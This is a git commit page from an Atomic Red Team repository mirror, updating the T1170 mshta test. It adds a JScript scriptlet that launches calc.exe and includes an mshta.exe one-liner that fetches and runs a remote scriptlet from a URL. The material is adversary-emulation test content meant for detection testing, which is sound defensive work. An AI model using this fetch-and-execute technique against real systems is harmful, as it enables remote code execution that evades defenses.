security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #249 from jmaas/T1170-add-payload

Browse Source 
Make T1170 self-contained; add payload and provide working URL's.
This commit is contained in:
Michael Haag
2018-06-12 10:06:18 -04:00
committed by GitHub
parent d7fc965d9c 106bb4b08f
commit 319edbe52c
2 changed files with 30 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1170/T1170.yaml
+1 -1
View File
@@ -12,7 +12,7 @@ atomic_tests:
file_url:
description: location of the payload
type: Url
default: https://www.example.com/mshta.sct
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
executor:
name: command_prompt
command: |
atomics/T1170/mshta.sct
+29
View File
@@ -0,0 +1,29 @@
<?XML version="1.0"?>
<scriptlet>
<!-- Test -->
<!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
}
]]>
</script>
</scriptlet>